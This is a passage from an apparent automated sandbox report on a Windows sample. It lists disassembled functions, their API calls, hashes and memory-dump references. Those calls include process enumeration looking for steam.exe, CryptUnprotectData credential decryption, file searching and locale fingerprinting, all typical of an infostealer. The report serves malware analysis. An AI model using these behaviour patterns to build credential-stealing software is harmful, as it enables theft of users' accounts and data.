                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                  • String ID: steam.exe
                                  • API String ID: 2284531361-2826358650
                                  • Opcode ID: a686ada21134badee910f53808985957c01e98f3ede1812666215f4efe453821
                                  • Instruction ID: c0e455143e1115ded4b931fc2c3d9437a4cb8876581f0bacc07169990e4e65b9
                                  • Opcode Fuzzy Hash: a686ada21134badee910f53808985957c01e98f3ede1812666215f4efe453821
                                  • Instruction Fuzzy Hash: 090184715011185BD720DBE09C48FEA7BACEB09754F0401E5F909D5140EB74D9949BE5
                                  Function 00FC4B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC4B51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4B74
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC4B7F
                                  • lstrlen.KERNEL32(00FE4CA8), ref: 00FC4B8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4BA7
                                  • lstrcat.KERNEL32(00000000,00FE4CA8), ref: 00FC4BB3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4BDE
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00FC4BFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID:
                                  • API String ID: 2567437900-0
                                  • Opcode ID: e4585c5951dabebc7677010efcdabdc5fbf9bbf5837e6668309ed887fae1e036
                                  • Instruction ID: 6f1f5e0c70d3a3a32f855e3977e2aeebf9b5ae6415c76cfc828a86a1c5b70f35
                                  • Opcode Fuzzy Hash: e4585c5951dabebc7677010efcdabdc5fbf9bbf5837e6668309ed887fae1e036
                                  • Instruction Fuzzy Hash: A6311F3191151A9BCB62FF65ED86FDE77B9AF90324F040128B815AB255CB38EC01BB91
                                  Function 00FD2D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00FD71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00FD71FE
                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00FD2D9B
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00FD2DAD
                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00FD2DBA
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00FD2DEC
                                  • LocalFree.KERNEL32(00000000), ref: 00FD2FCA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 2b3b1f5cc54fbff598d8d4a6b5a94aa85ce0ae8e23c3c6ae319a8c09b777b38f
                                  • Instruction ID: 1b5fa1c7da6e045023fc576e708c88cf29ecd68df68e086361c5981020168ce1
                                  • Opcode Fuzzy Hash: 2b3b1f5cc54fbff598d8d4a6b5a94aa85ce0ae8e23c3c6ae319a8c09b777b38f
                                  • Instruction Fuzzy Hash: D1B10771900204CFC769CF58C948B99B7F2BB44329F2DC5AAD4089B3A6D7769D82DF80
                                  Function 013684F3 Relevance: 9.1, Strings: 6, Instructions: 1581COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 2:$5&u_$<vo$<vo$naf$Jo
                                  • API String ID: 0-2900013186
                                  • Opcode ID: 63876f3653154da4120900a447aac90db1f8a2977c2fe4bea5ce9fe2d0240c59
                                  • Instruction ID: b8a1646a25d615e8f453c546b3d0eaadb12e79f69adfa13c51c0fa036256d929
                                  • Opcode Fuzzy Hash: 63876f3653154da4120900a447aac90db1f8a2977c2fe4bea5ce9fe2d0240c59
                                  • Instruction Fuzzy Hash: DDB2F2F360C2109FE304AE29EC8577ABBE5EF94720F16893DEAC4C7744EA3558048697
                                  Function 0136EFB9 Relevance: 9.1, Strings: 6, Instructions: 1571COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: #w[w$#w[w$IA0$a8w}$j,]$j,]
                                  • API String ID: 0-496744614
                                  • Opcode ID: 6893289dd9ac240038813c3ebe8aed252283ed2d0bc7ed7f52273b07bdeb4626
                                  • Instruction ID: d95fac5a2eeb0f59947e0aa934b2044bcbc501b9d4c773991fddc6f785221f92
                                  • Opcode Fuzzy Hash: 6893289dd9ac240038813c3ebe8aed252283ed2d0bc7ed7f52273b07bdeb4626
                                  • Instruction Fuzzy Hash: AAB2F4F360C2049FE704AF29EC8567ABBE9EF94720F16493DE6C487344EA3598058797
                                  Function 0136507C Relevance: 9.1, Strings: 6, Instructions: 1568COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: (RZC$Qnr$^mu$ifb $nOq$xy{
                                  • API String ID: 0-3785139987
                                  • Opcode ID: b6502073cb30078b3dc7ce910bd5b42f0de07363eda3442339116a272760814a
                                  • Instruction ID: 29d4b05eb10cc7491a607f6517dabc2883872bc61b739007b17754fa33207e76
                                  • Opcode Fuzzy Hash: b6502073cb30078b3dc7ce910bd5b42f0de07363eda3442339116a272760814a
                                  • Instruction Fuzzy Hash: DAA205F360C2149FE7046E2DEC8577ABBE9EF94360F1A493DEAC4C7740E63558018696
                                  Function 00FD2C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00FD2C42
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FD2C49
                                  • GetTimeZoneInformation.KERNEL32(?), ref: 00FD2C58
                                  • wsprintfA.USER32 ref: 00FD2C83
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID: wwww
                                  • API String ID: 3317088062-671953474
                                  • Opcode ID: 8d02c7dc98cbd814a9b7f2d0c9ba018ab7ff155712deecebac20634313689d4e
                                  • Instruction ID: 9a0e0c383f7f3a3d74f9296ba9aee859cc62f3246bba2c8331250cb039ade631
                                  • Opcode Fuzzy Hash: 8d02c7dc98cbd814a9b7f2d0c9ba018ab7ff155712deecebac20634313689d4e
                                  • Instruction Fuzzy Hash: 4E01F771A00604ABCB2C8B98DC09B6DBBADEB84721F04432AF925DB3C0D774590087D2
                                  Function 01370B35 Relevance: 7.9, Strings: 5, Instructions: 1697COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: F8g^$Fu+$QQ}[$`[}$o|~
                                  • API String ID: 0-3913461928
                                  • Opcode ID: d2870c790b67cd0ac8229ded7b88d8d3b0d9a66dbb783b79a02a91802633abe0
                                  • Instruction ID: 7daaa6d3c691a3986f6dad92d52c285e8d9dff5b34168d3278119cf1aa227323
                                  • Opcode Fuzzy Hash: d2870c790b67cd0ac8229ded7b88d8d3b0d9a66dbb783b79a02a91802633abe0
                                  • Instruction Fuzzy Hash: 76B24BF3A0C214AFE3046E2DEC8567ABBE5EF94720F16463DEAC4C3744EA3558018697
                                  Function 00FB7750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00FB775E
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FB7765
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00FB778D
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00FB77AD
                                  • LocalFree.KERNEL32(?), ref: 00FB77B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 319dfde7f7a3c77f44706ee9e615fa06cdbc2d42c4ac20e5a104ef7cd74d0589
                                  • Instruction ID: 959d773400cf41e1431f42e72e09cf3775e17366766a5f024eaaa889b09f0ead
                                  • Opcode Fuzzy Hash: 319dfde7f7a3c77f44706ee9e615fa06cdbc2d42c4ac20e5a104ef7cd74d0589
                                  • Instruction Fuzzy Hash: 3E014075B403087BEB24DAD49C0AFAA7BBCEB44B14F104155FA15EA2C0D6B099408B90
                                  Function 01366A6A Relevance: 6.7, Strings: 4, Instructions: 1672COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !\[$$-|$<|s$wK.R
                                  • API String ID: 0-3816430732
                                  • Opcode ID: 78a971b6bdcbeec54dc4e8cdd679c36fc5e97a60ad7b79599992956ea76c9641
                                  • Instruction ID: ac35640d80d9f2138f917bb819ab296f488c970505f137769da113b12475b533
                                  • Opcode Fuzzy Hash: 78a971b6bdcbeec54dc4e8cdd679c36fc5e97a60ad7b79599992956ea76c9641
                                  • Instruction Fuzzy Hash: 12B22AF360C2009FE304AE2DEC8567ABBEAEFD4720F16853DE6C4C7744EA7558058696
                                  Function 013602E5 Relevance: 6.4, Strings: 4, Instructions: 1415COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
